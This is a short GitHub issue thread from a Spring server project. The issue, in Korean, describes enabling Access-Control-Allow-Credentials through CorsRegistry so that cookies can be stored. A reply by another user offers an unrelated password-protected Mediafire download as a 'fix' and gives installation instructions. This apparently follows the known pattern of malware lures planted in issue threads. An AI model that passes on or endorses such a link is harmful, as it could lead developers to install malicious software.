### ISSUE TITLE
fix: http credential 설정

### ISSUE THREAD

**Issue by jongmee** [team-crews/crews-server-spring#47]
## Problem 🐞

>현재 쿠키를 브라우저에 저장할 수 없다. http credential을 요청/응답에서 허용하기 위해 `Access-Control-Allow-Credentials` 값을 true로 설정해야 한다.

## Progress 🐢

- [x] `CorsRegistry `에서 credential과 header 설정

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
